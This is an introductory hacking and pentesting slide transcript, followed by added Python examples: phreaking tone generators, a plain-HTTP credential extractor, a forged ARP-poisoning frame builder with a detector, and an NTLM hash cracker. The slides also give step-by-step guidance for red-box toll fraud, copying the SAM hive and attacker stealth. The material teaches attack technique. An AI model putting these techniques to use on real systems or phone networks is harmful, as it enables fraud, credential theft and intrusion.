Hacking: What is it and how is it done? Introduction to Cybersecurity Slides by Raymond Borges

Uploaded by rayborg, posted 31-Oct-2014
DESCRIPTION

Brief intro to computer security and pentesting.

TRANSCRIPT

Slide 1: Hacking: What is it and how is it done?
Introduction to Cybersecurity
Slides by Raymond Borges

Slide 2: Outline
Background
Hacking 101
The penetration test: Reconnaissance, Enumeration, Gaining access, Privilege escalation, Maintaining access, Stealth
Conclusion

Slide 3: Background
Phone phreaks were some of the first hackers.
Phreaking: the activity of a culture of people who study, experiment with, or explore telecom systems.
Blue box: a tone generator capable of producing the signaling frequencies that control phone trunks, and so of hacking them.

Slide 4: Background
Below is the blue box built by Steve Wozniak, on display at the Computer History Museum, and also the Captain Crunch whistle.

Slide 5: The Blue Box
How did the Blue Box work?
1. The user places a long-distance telephone call.
2. While the call is ringing, he sends the 2600 Hz tone.
3. To the trunk, this tone signals that the caller has hung up.
4. The line makes a "Ka-Cheep" noise, followed by silence; the trunk is now idle and waiting for routing digits.
5. Send a Key Pulse (KP) followed by the telephone number (in trunk MF signaling the digits are closed with a Start, ST, tone).
6. You just made a free call.

Slide 6: Phreaking boxes!!!
Blue: makes free calls by generating the 2600 Hz tone followed by the Key Pulse and routing digits (slide 5).
Red: generates the tones that simulate inserting coins into a pay phone.
Black: a small electronic circuit added to a telephone that provided the caller with a free call.

Slide 7: Make your own Red Box
1. Download any free tone generator, e.g. NCH Tone Generator.
2. Create at least one 5, 10 or 25 cent tone sequence by combining 1.7 kHz and 2.2 kHz, i.e. 5 cents = one 66 ms tone (10 cents = two 66 ms tones, 25 cents = five 33 ms tones).
3. Save the tone and play it back into the payphone microphone.
4. Free calls!

Slide 8: Hacking 101
Hacking is the investigation and exploitation of system vulnerabilities.
Hacking expertise varies; some categories are:
Newbies: know the basic concepts but have little practice
Cyberpunks: know the tools of the trade
Coders: write the tools to automate hacks
Cyber terrorists: threats to national security

Slide 9: Hacker Hats
White hats: security professionals (defense)
Black hats: crackers, the bad guys
Grey hats: in between

Slide 10: The penetration test
Common steps in a pen test or hacking:
1. Reconnaissance
2. Scanning and enumeration
3. Gaining access
4. Escalation of privileges
5. Maintaining access
6. Covering tracks

Slide 11: Information Gathering (Recon.)

Slide 12: Scanning
The steps for a scanning methodology are:
1. Identify live systems
2. Discover open ports
3. Identify the OS and services
4. Scan for vulnerabilities

Slide 13: Gaining Access
Once known vulnerabilities are enumerated, learn how far exploiting them gets you.
The keystone of security is authentication, and the most used authentication method is the password.

Slide 14: Password Attacks
Passive online attack, e.g. a packet sniffer capturing a password sent in plaintext in network traffic
Active online attack, e.g. password guessing
Offline password cracking, e.g. stealing the password hashes and cracking them offline
Keylogging, e.g. a hardware or software keystroke logger

Slide 15: Passive online attack
Target: http://www.httprecipes.com/1/2/forms.php
1. Run Wireshark
2. Filter on http
3. Find the POST method
4. Follow TCP stream
5. You have the username and password in the clear if the server isn't using HTTPS (SSL/TLS) or other encryption

Slide 16: Replay and Man-in-the-middle
When passwords can't be caught in plaintext:
Man-in-the-middle
ARP poisoning
Session hijacking
Replay attack

Slide 17: Cain and Abel (ARP poisoning)
1. Install Cain and Abel
2. Connect to a network
3. Select the Sniffer tab
4. Start the sniffer and select the network interface
5. Select Hosts at the bottom, press the plus (+) button, then OK
6. Select the APR tab at the bottom and click in the top window
7. Press the plus (+) button, select the target IP, then hit OK
8. Hit the Start/Stop APR button, then select the Passwords tab (HTTP)

Slide 18: Cain and Abel (ARP poisoning)
Man-in-the-middle (worked in Firefox 7):
http://www.voddler.com/ (clueless of attack)
http://www.cnet.com/ (clueless of attack)
https://www.fxhome.com/ (invalid certificate)
https://www.yahoo.com/ (invalid certificate)
https://www.amazon.com/ (invalid certificate)
Invalid certificate, but worked in Internet Explorer 9 if the user continues:
https://accounts.google.com (Gmail) (sometimes; *cookies)
https://login.live.com (Hotmail)

Slide 19: Cain and Abel (ARP poisoning)
Secured (Internet Explorer and Firefox):
http://www.facebook.com
https://www.facebook.com
https://www.paypal.com/
Firefox version 7: secured, detects the invalid certificate with no option to continue:
https://www.paypal.com

Slide 20: Active online attack (Guessing)
1. Your partner's, child's or pet's name, possibly followed by a 0 or 1 (because they're always making you use a number, aren't they?)
2. The last 4 digits of your social security number
3. 123 or 1234 or 123456
4. password
5. Your city, or college, football team name
6. Date of birth: yours, your partner's or your child's
7. god
8. letmein
9. money
10. love
This list covered about 20% of passwords as of March 31, 2010, according to Lifehacker.com.

Slide 21: Offline password cracking
On Windows systems the password hashes are in the SAM hive, C:\Windows\System32\config\SAM (a backup copy may exist under C:\Windows\repair). Copy the SAM and SYSTEM files; the SYSTEM hive holds the boot key needed to decrypt the SAM.
http://www.youtube.com/watch?v=SDsJbgl2J8E
On Linux the password hashes are in the shadow file, /etc/shadow.
Crack the password hash files (Cain and Abel).

Slide 22: Offline password cracking
1. Copy the SAM and SYSTEM files
2. Run Cain and Abel
3. Select the Cracker tab
4. Select LM & NTLM Hashes
5. Select the plus sign
6. Add the SAM and SYSTEM files
7. Copy the boot key (extracted from the SYSTEM hive), exit and paste it
8. Right-click and crack. LM hashes are stored by default only on Windows versions before Vista; on Vista and later, crack the NTLM hashes

Slide 23: Keyloggers
Record every keystroke the user makes.
Software keyloggers can send passwords to remote computers (low risk for the hacker).
Hardware keyloggers may be small dongles placed on the back of a desktop (high risk for the hacker, who must plant and later retrieve them).

Slide 24: Other forms of Gaining Access
Trojans and backdoors. A Trojan can accomplish any number of things, from sending email, keylogging and stealing data to turning your computer into a zombie. Usually it provides an entrance and a form of maintaining access by implementing a backdoor.

Slide 25: Privilege Escalation
Once inside, a hacker can seek better ways of cracking the root or administrator password.
A good tool that is somewhat famous in the hacker community is Metasploit. Metasploit is a semi-automated framework for exploiting known vulnerabilities, including ones that lead to role elevation.

Slide 26: Stealth
Some tactics are:
1. Use passive attacks
2. Use proxies
3. Use the Tor anonymity network if possible
4. Hack from open or public access points
5. Use attack diversions when performing the real active attacks that could expose you

Slide 27: Conclusion
Nothing is secure.
Security is a matter of the cost of attack vs. the value of the information.
Cost can be calculated in dollars and effort.
Active attack = high risk (for the attacker).
Passive attack = low risk.

Slide 28: References
Matt Walker, CEH All-in-One Exam Guide, 2011
William Stallings and Lawrie Brown, Computer Security: Principles and Practice, 2008
Jon Erickson, Hacking: The Art of Exploitation, 2008
http://www.nch.com.au/tonegen/faq.html
http://sectools.org/index.html
http://www.lifehacker.com.au/2010/03/how-i%E2%80%99d-hack-your-weak-passwords/
http://www.youtube.com/watch?v=7ezGTP99xSw
http://www.wireshark.org/docs/wsug_html_chunked/ChWorkBuildDisplayFilterSection.html
http://www.youtube.com/watch?v=C_trnrkkPUs&feature=related

Slide 29: Questions?
You've been hacked!
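The blue box sequence on slide 5 and the red box coin tones on slide 7 can both be synthesized, and, from the other side of the line, detected. The Python below is an added example written for this page, not code from the slides or from NCH Tone Generator: it generates the 2600 Hz seize tone followed by KP, the digits and ST, and the 1.7 kHz + 2.2 kHz coin bursts, writes them as WAV, and includes a Goertzel-based detector of the kind the payphone's coin-tone receiver or the trunk's MF receiver runs. The MF digit frequency pairs, the 8 kHz sample rate, the 60 ms symbol timing, and the dime (two 66 ms bursts) and quarter (five 33 ms bursts) patterns are standard values assumed here; the slides themselves give only 2600 Hz, KP, and the nickel's single 66 ms tone.

```python
import math
import struct
import wave

SAMPLE_RATE = 8000  # Hz; telephone-quality audio (assumption for this example)

# Multi-frequency (MF) signaling pairs the old trunks listened for after the
# 2600 Hz "hang-up" tone. The slides name only 2600 Hz and "Key Pulse"; these
# pair values are the standard MF frequencies and are assumed here.
MF_PAIRS = {
    "1": (700, 900),   "2": (700, 1100),  "3": (900, 1100),
    "4": (700, 1300),  "5": (900, 1300),  "6": (1100, 1300),
    "7": (700, 1500),  "8": (900, 1500),  "9": (1100, 1500),
    "0": (1300, 1500), "KP": (1100, 1700), "ST": (1500, 1700),
}
SEIZE_HZ = 2600  # single tone that tells the trunk the caller hung up (slide 5)

# Red box coin signals (slide 7): 1.7 kHz + 2.2 kHz bursts.
# (burst length in ms, number of bursts); gaps between bursts equal the burst length.
COIN_BURSTS = {"nickel": (66, 1), "dime": (66, 2), "quarter": (33, 5)}


def tone(freqs, ms, amplitude=0.4):
    """Samples (floats in [-1, 1]) of the summed sine waves `freqs` lasting `ms` milliseconds."""
    n = SAMPLE_RATE * ms // 1000
    per = amplitude / len(freqs)
    return [per * sum(math.sin(2 * math.pi * f * i / SAMPLE_RATE) for f in freqs)
            for i in range(n)]


def silence(ms):
    return [0.0] * (SAMPLE_RATE * ms // 1000)


def blue_box(number, digit_ms=60):
    """Seize the trunk with 2600 Hz, wait, then send KP + digits + ST (slide 5).
    60 ms on / 60 ms off per MF symbol is an assumed timing."""
    out = tone((SEIZE_HZ,), 1000) + silence(1500)
    for sym in ["KP", *number, "ST"]:
        out += tone(MF_PAIRS[sym], digit_ms) + silence(digit_ms)
    return out


def red_box(coin):
    """Coin-deposit tone sequence for 'nickel', 'dime' or 'quarter'."""
    ms, count = COIN_BURSTS[coin]
    out = []
    for i in range(count):
        out += tone((1700, 2200), ms)
        if i < count - 1:
            out += silence(ms)
    return out


def goertzel(samples, freq):
    """Signal energy at `freq`: the computation a tone detector on the payphone
    or trunk side performs for each frequency it watches."""
    k = 2 * math.cos(2 * math.pi * freq / SAMPLE_RATE)
    s1 = s2 = 0.0
    for x in samples:
        s0 = x + k * s1 - s2
        s2, s1 = s1, s0
    return s1 * s1 + s2 * s2 - k * s1 * s2


def looks_like_coin(samples):
    """True when both red-box frequencies dominate (1000 Hz is an off-band reference)."""
    reference = goertzel(samples, 1000) + 1e-9
    return (goertzel(samples, 1700) > 10 * reference
            and goertzel(samples, 2200) > 10 * reference)


def decode_mf_symbol(samples):
    """Recover the MF symbol of one burst from its two strongest MF frequencies."""
    strongest = sorted((700, 900, 1100, 1300, 1500, 1700),
                       key=lambda f: goertzel(samples, f), reverse=True)[:2]
    pair = tuple(sorted(strongest))
    return next((sym for sym, p in MF_PAIRS.items() if p == pair), None)


def write_wav(path, samples):
    """Write 16-bit mono PCM so the sequence can be played back."""
    with wave.open(path, "wb") as w:
        w.setnchannels(1)
        w.setsampwidth(2)
        w.setframerate(SAMPLE_RATE)
        w.writeframes(b"".join(struct.pack("<h", int(s * 32767)) for s in samples))


if __name__ == "__main__":
    write_wav("redbox_quarter.wav", red_box("quarter"))
    write_wav("bluebox.wav", blue_box("5551212"))  # constructed number
```

The detector side is the part worth noticing: a payphone that only checks energy at 1700 Hz and 2200 Hz against an off-band reference is exactly as easy to fool as slide 7 says, because it has no way to tell a speaker from a coin mechanism.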
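Step 5 on slide 15 ("username and password in the clear"): what Wireshark's Follow TCP Stream hands you is raw HTTP, and pulling the credentials out of it is a parsing job. The Python below is an added example, not code from the slides; the captured stream is constructed for it (hosts, users and passwords are invented, only the /1/2/forms.php path comes from the slide), and the user/password field names it recognizes are a heuristic list. It handles the two ways credentials travel in plain HTTP: a form POST, and the Basic Authorization header, which is base64, not encryption.

```python
import base64
from urllib.parse import parse_qs

# Constructed stand-in for what Wireshark's "Follow TCP Stream" shows for one
# client/server conversation over plain HTTP. Hosts and credentials are made up;
# the /1/2/forms.php path is the target used on slide 15.
SAMPLE_STREAM = (
    # client -> server: HTTP Basic auth is base64, not encryption
    b"GET /private/ HTTP/1.1\r\n"
    b"Host: www.example.test\r\n"
    b"Authorization: Basic Ym9iOmh1bnRlcjI=\r\n"
    b"\r\n"
    # server -> client
    b"HTTP/1.1 200 OK\r\nContent-Length: 2\r\n\r\nok"
    # client -> server: login form submitted as a POST
    b"POST /1/2/forms.php HTTP/1.1\r\n"
    b"Host: www.httprecipes.com\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 36\r\n"
    b"\r\n"
    b"uid=alice&pwd=s3cret%21&submit=Login"
    # server -> client
    b"HTTP/1.1 302 Found\r\nLocation: /1/2/welcome.php\r\nContent-Length: 0\r\n\r\n"
)

# Heuristic field names (assumption): real forms use many more.
USER_FIELDS = ("user", "username", "uid", "login", "email")
PASS_FIELDS = ("pass", "password", "pwd", "passwd")


def split_messages(stream):
    """Yield (start_line, headers, body) for each HTTP message in the stream.
    Bodies are delimited by Content-Length only; chunked encoding is not handled."""
    pos = 0
    while True:
        end = stream.find(b"\r\n\r\n", pos)
        if end < 0:
            return
        lines = stream[pos:end].decode("latin-1").split("\r\n")
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        length = int(headers.get("content-length", "0"))
        body_start = end + 4
        yield lines[0], headers, stream[body_start:body_start + length]
        pos = body_start + length


def extract_credentials(stream):
    """Pull credentials out of every request in a captured plain-HTTP stream."""
    found = []
    for start_line, headers, body in split_messages(stream):
        if start_line.startswith("HTTP/"):  # a response, not a request
            continue
        method, _, rest = start_line.partition(" ")
        url = headers.get("host", "") + rest.split(" ")[0]
        auth = headers.get("authorization", "")
        if auth.lower().startswith("basic "):
            user, _, pwd = base64.b64decode(auth[6:]).decode("latin-1").partition(":")
            found.append({"url": url, "user": user, "password": pwd, "source": "basic-auth"})
        ctype = headers.get("content-type", "")
        if method == "POST" and ctype.startswith("application/x-www-form-urlencoded"):
            fields = {k.lower(): v[0] for k, v in parse_qs(body.decode("latin-1")).items()}
            user = next((fields[k] for k in USER_FIELDS if k in fields), None)
            pwd = next((fields[k] for k in PASS_FIELDS if k in fields), None)
            if user is not None and pwd is not None:
                found.append({"url": url, "user": user, "password": pwd, "source": "form-post"})
    return found


if __name__ == "__main__":
    for cred in extract_credentials(SAMPLE_STREAM):
        print(cred)
```

Over HTTPS the same Follow TCP Stream view shows only TLS records, so nothing here applies unless the attacker terminates the TLS session himself, which is what the ARP poisoning on slides 16 to 19 (and the invalid-certificate warnings it produces) is about.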
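Slides 16 and 17 run the ARP poisoning through Cain and Abel's GUI. To show what such a tool actually puts on the wire, and the check a defender runs against it, here is an added Python example (not Cain's code and not from the slides): it builds the forged Ethernet/ARP reply frames a poisoner sends to the victim and to the gateway, parses them back, and keeps an IP-to-MAC table that flags a changed claim. The addresses are made up; the frame layout is plain RFC 826 ARP over Ethernet.

```python
import struct

ETH_TYPE_ARP = 0x0806
ARP_REPLY = 2
ARP_FMT = "!HHBBH6s4s6s4s"  # htype, ptype, hlen, plen, oper, sha, spa, tha, tpa


def mac_bytes(text):
    return bytes.fromhex(text.replace(":", ""))


def ip_bytes(text):
    return bytes(int(octet) for octet in text.split("."))


def mac_text(raw):
    return ":".join(f"{b:02x}" for b in raw)


def ip_text(raw):
    return ".".join(str(b) for b in raw)


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Raw Ethernet + ARP 'sender_ip is-at sender_mac' frame, unicast to the target.
    Nothing in ARP authenticates the sender, which is why a forged reply works."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_TYPE_ARP)
    arp = struct.pack(ARP_FMT, 1, 0x0800, 6, 4, ARP_REPLY,
                      mac_bytes(sender_mac), ip_bytes(sender_ip),
                      mac_bytes(target_mac), ip_bytes(target_ip))
    return eth + arp


def poison_pair(attacker_mac, victim_mac, victim_ip, gateway_mac, gateway_ip):
    """The two forged replies a poisoner keeps re-sending: the victim is told the
    gateway lives at the attacker's MAC, and the gateway is told the same about
    the victim, so traffic in both directions passes through the attacker's host."""
    to_victim = build_arp_reply(attacker_mac, gateway_ip, victim_mac, victim_ip)
    to_gateway = build_arp_reply(attacker_mac, victim_ip, gateway_mac, gateway_ip)
    return to_victim, to_gateway


def parse_arp(frame):
    """Decode an Ethernet frame carrying ARP; None for anything else."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_TYPE_ARP:
        return None
    htype, ptype, hlen, plen, oper, sha, spa, tha, tpa = struct.unpack(ARP_FMT, frame[14:42])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {"op": oper, "sender_mac": mac_text(sha), "sender_ip": ip_text(spa),
            "target_mac": mac_text(tha), "target_ip": ip_text(tpa)}


class ArpWatch:
    """Defender's side: remember which MAC each IP claimed and flag a change.
    Pass the gateway's known-good mapping as `static` so that the first frame
    seen cannot itself be the poisoned one."""

    def __init__(self, static=None):
        self.static = dict(static or {})
        self.seen = {}

    def observe(self, frame):
        pkt = parse_arp(frame)
        if pkt is None or pkt["op"] != ARP_REPLY:
            return None
        ip_addr, mac = pkt["sender_ip"], pkt["sender_mac"]
        expected = self.static.get(ip_addr, self.seen.get(ip_addr))
        self.seen.setdefault(ip_addr, mac)
        if expected is not None and expected != mac:
            return f"ARP poisoning suspected: {ip_addr} was {expected}, now claimed by {mac}"
        return None
```

A watcher that learns from the first reply it sees is only as good as that first reply; on a network where the poisoner is already running, seed it with the gateway's real MAC (the `static` table) or it will happily learn the forged mapping as truth.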
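Slides 21 and 22 end at "crack the hashes". Cain's import step needs the SYSTEM hive's boot key to decrypt the SAM; the added Python example below starts one step later, from hashes already dumped in pwdump format, and shows what the cracking itself is: the NT hash is MD4 of the UTF-16LE password with no salt, so a dictionary is hashed once and matched against every account at no extra cost. This is not code from the slides or from Cain. The dump is constructed (the Administrator line carries the real NT hash of "password", ray's line is computed from "letmein", svc_backup's value is arbitrary and uncrackable here) and the wordlist is the guess list from slide 20. MD4 is implemented inline because hashlib's md4 is missing on many OpenSSL 3 builds. The all-aad3b435 LM field is the value stored when no LM hash exists, the Vista-and-later default that slide 22 refers to.

```python
import struct

MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data):
    """Pure-Python MD4 (RFC 1320). Slow, which does not matter for a demonstration."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000,
         list(range(16)), (3, 7, 11, 19)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
         [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
         [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for func, const, order, shifts in rounds:
            for i, idx in enumerate(order):
                a = _rotl((a + func(b, c, d) + x[idx] + const) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate roles so the next step updates the next word
        state = [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def ntlm_hash(password):
    """NT hash as stored in the SAM: MD4 of the UTF-16LE password, no salt."""
    return md4(password.encode("utf-16-le")).hex()


# LM field value meaning "no LM hash stored" (the default from Vista on).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"


def parse_pwdump(text):
    """Lines in pwdump format, user:RID:LM hash:NT hash:::, which is what dump
    tools export after decrypting the SAM with the SYSTEM hive's boot key."""
    entries = []
    for line in text.strip().splitlines():
        user, rid, lm, nt = line.split(":")[:4]
        entries.append({"user": user, "rid": int(rid), "lm": lm.lower(),
                        "nt": nt.lower(), "has_lm": lm.lower() != EMPTY_LM})
    return entries


def crack_ntlm(entries, wordlist):
    """Dictionary attack. NT hashes are unsalted, so each candidate is hashed
    once and looked up against every account; more accounts cost nothing extra."""
    lookup = {ntlm_hash(word): word for word in wordlist}
    return {e["user"]: lookup[e["nt"]] for e in entries if e["nt"] in lookup}


# Constructed sample dump. The Administrator hash is the real NT hash of
# "password"; ray's is computed from "letmein"; svc_backup's is an arbitrary value.
SAMPLE_PWDUMP = "\n".join([
    f"Administrator:500:{EMPTY_LM}:8846f7eaee8fb117ad06bdd830b7586c:::",
    f"ray:1001:{EMPTY_LM}:{ntlm_hash('letmein')}:::",
    f"svc_backup:1002:{EMPTY_LM}:0123456789abcdef0123456789abcdef:::",
])

# The fixed guesses from slide 20 make a small wordlist.
WORDLIST = ["123456", "password", "letmein", "god", "money", "love", "1234", "123"]


if __name__ == "__main__":
    for user, pw in crack_ntlm(parse_pwdump(SAMPLE_PWDUMP), WORDLIST).items():
        print(f"{user}: {pw}")
```

The absence of a salt is the whole story of slide 22: the lookup table built from the wordlist is reusable against every SAM ever dumped, which is what makes precomputed (rainbow) tables and GPU cracking effective against NT hashes, and it is worse still for LM hashes, which are additionally case-insensitive and split into two 7-character halves.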